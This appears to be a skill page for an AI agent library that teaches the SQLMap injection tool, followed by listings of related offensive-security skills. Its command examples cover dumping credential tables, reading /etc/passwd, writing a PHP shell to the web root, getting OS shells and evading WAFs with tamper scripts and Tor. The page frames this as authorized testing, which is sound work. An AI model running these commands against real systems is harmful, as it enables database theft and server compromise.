webapp-sqlmap
Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.
What this skill does
# SQLMap - Automated SQL Injection Tool
## Overview
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.
**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.
## Quick Start
Basic SQL injection detection:
```bash
# Test single parameter
sqlmap -u "http://example.com/page?id=1"
# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"
# Test from saved request file
sqlmap -r request.txt
# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
```
## Core Workflow
### SQL Injection Testing Workflow
Progress:
[ ] 1. Verify authorization for web application testing
[ ] 2. Identify potential injection points
[ ] 3. Detect SQL injection vulnerabilities
[ ] 4. Determine DBMS type and version
[ ] 5. Enumerate databases and tables
[ ] 6. Extract sensitive data (if authorized)
[ ] 7. Document findings with remediation guidance
[ ] 8. Clean up any test artifacts
Work through each step systematically. Check off completed items.
### 1. Authorization Verification
**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures
### 2. Target Identification
Identify potential SQL injection points:
**GET Parameters**:
```bash
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"
# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"
# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
```
**POST Requests**:
```bash
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"
# From Burp Suite request file
sqlmap -r login_request.txt
# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"
```
**Cookies and Headers**:
```bash
# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"
# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"
# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
```
### 3. Detection and Fingerprinting
Detect SQL injection vulnerabilities:
```bash
# Basic detection
sqlmap -u "http://example.com/page?id=1"
# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3
# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ
# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint
# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
```
**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries
### 4. Database Enumeration
Enumerate database structure:
```bash
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs
# Current database
sqlmap -u "http://example.com/page?id=1" --current-db
# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables
# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns
# Database users
sqlmap -u "http://example.com/page?id=1" --users
# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges
```
### 5. Data Extraction
Extract data from database (authorized only):
```bash
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump
# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump
# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all
# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs
# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
```
### 6. Advanced Exploitation
Advanced SQL injection techniques:
**File System Access**:
```bash
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
```
**OS Command Execution** (requires stacked queries or out-of-band):
```bash
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"
# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell
# Get SQL shell
sqlmap -u "http://example.com/page?id=1" --sql-shell
```
**Authentication Bypass**:
```bash
# Attempt to bypass login
sqlmap -u "http://example.com/login" --data="user=admin&pass=test" --auth-type=Basic
# Test with authentication
sqlmap -u "http://example.com/page?id=1" --auth-cred="admin:password"
```
### 7. WAF Bypass and Evasion
Evade web application firewalls:
```bash
# Use tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment
# Multiple tamper scripts
sqlmap -u "http://example.com/page?id=1" --tamper=space2comment,between
# Random User-Agent
sqlmap -u "http://example.com/page?id=1" --random-agent
# Custom User-Agent
sqlmap -u "http://example.com/page?id=1" --user-agent="Mozilla/5.0..."
# Add delay between requests
sqlmap -u "http://example.com/page?id=1" --delay=2
# Use proxy
sqlmap -u "http://example.com/page?id=1" --proxy="http://127.0.0.1:8080"
# Use Tor
sqlmap -u "http://example.com/page?id=1" --tor --check-tor
```
**Common Tamper Scripts**:
- `space2comment`: Replace space with comments
- `between`: Replace equals with BETWEEN
- `charencode`: URL encode characters
- `randomcase`: Random case for keywords
- `apostrophemask`: Replace apostrophe with UTF-8
- `equaltolike`: Replace equals with LIKE
## Security Considerations
### Authorization & Legal Compliance
- **Written Permission**: Obtain explicit authorization for SQL injection testing
- **Data Protection**: Handle extracted data per engagement rules
- **Scope Boundaries**: Only test explicitly authorized applications
- **Backup Verification**: Ensure backups exist before invasive testing
- **Production Systems**: Extra caution on production databases
### Operational Security
- **Rate Limiting**: Use --delay to avoid overwhelming applications
- **Session Management**: Save and resume sessions with --flush-session
- **Logging**: All SQLMap activity is logged to ~/.sqlmap/output/
- **Data Sanitization**: Redact sensitive data from reports
- **False Positives**: Verify findings manually
### Audit Logging
Document all SQL injection testing:
- Target URLs and parameters tested
- Injection techniques successful
- Databases and tables accessed
- Data extracted (summary only, not full data)
- Commands executed
- Tamper scripts and evasion used
### Compliance
- **OWASP Top 10**: A03:2021 - Injection
- **CWE-89**: SQL Injection
- **MITRE ATT&CK**: T1190 (Exploit Public-Facing Application)
- **PCI-DSS**: 6.5.1 - Injection flaws
- **ISO 27001**: A.14.2 Security in development
## Common Patterns
### Pattern 1: Basic Vulnerability Assessment
```bash
# Detect vulnerability
sqlmap -u "http://example.com/page?id=1" --batch
# Enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs --batch
# Get current user and privileges
sqlmap -u "http://example.com/page?id=1" --current-user --current-db --is-dba --batch
```
### Pattern 2: Authentication Bypass Testing
``Related in offsec
privesc-linpeas
IncludedLinux privilege escalation enumeration and attack surface analysis using LinPEAS (Linux Privilege Escalation Awesome Script). Automates post-exploitation discovery of escalation vectors, misconfigurations, and credential exposure on Linux targets. Use when: (1) Enumerating privilege escalation vectors after initial access on a Linux system, (2) Identifying SUID/SGID binaries, sudo misconfigurations, and capability abuses, (3) Hunting for credentials in config files, history, and logs, (4) Detecting container breakout opportunities and writable service files, (5) Mapping kernel exploits and CVE exposure for a target system, (6) Conducting authorized CTF, red team, or penetration test post-exploitation phases.
analysis-tshark
IncludedNetwork protocol analyzer and packet capture tool for traffic analysis, security investigations, and forensic examination using Wireshark's command-line interface. Use when: (1) Analyzing network traffic for security incidents and malware detection, (2) Capturing and filtering packets for forensic analysis, (3) Extracting credentials and sensitive data from network captures, (4) Investigating network anomalies and attack patterns, (5) Validating encryption and security controls, (6) Performing protocol analysis for vulnerability research.
analysis-tshark
IncludedNetwork protocol analyzer and packet capture tool for traffic analysis, security investigations, and forensic examination using Wireshark's command-line interface. Use when: (1) Analyzing network traffic for security incidents and malware detection, (2) Capturing and filtering packets for forensic analysis, (3) Extracting credentials and sensitive data from network captures, (4) Investigating network anomalies and attack patterns, (5) Validating encryption and security controls, (6) Performing protocol analysis for vulnerability research.
crack-hashcat
IncludedAdvanced password recovery and hash cracking tool supporting multiple algorithms and attack modes. Use when: (1) Performing authorized password auditing and security assessments, (2) Recovering passwords from captured hashes in forensic investigations, (3) Testing password policy strength and complexity, (4) Validating encryption implementations, (5) Conducting security research on cryptographic hash functions, (6) Demonstrating password weakness in penetration testing reports.
network-netcat
IncludedNetwork utility for reading and writing data across TCP/UDP connections, port scanning, file transfers, and backdoor communication channels. Use when: (1) Testing network connectivity and port availability, (2) Creating reverse shells and bind shells for authorized penetration testing, (3) Transferring files between systems in restricted environments, (4) Banner grabbing and service enumeration, (5) Establishing covert communication channels, (6) Testing firewall rules and network segmentation.
pentest-metasploit
IncludedPenetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.